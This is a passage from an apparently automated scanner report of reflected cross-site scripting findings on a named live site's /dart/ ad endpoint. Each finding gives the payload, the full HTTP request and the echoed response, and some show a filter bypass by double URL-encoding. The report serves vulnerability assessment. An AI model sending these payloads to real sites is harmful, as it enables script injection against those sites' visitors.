User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

2.10. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

2.11. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.12. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

2.13. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.14. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

2.15. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.16. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

2.17. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
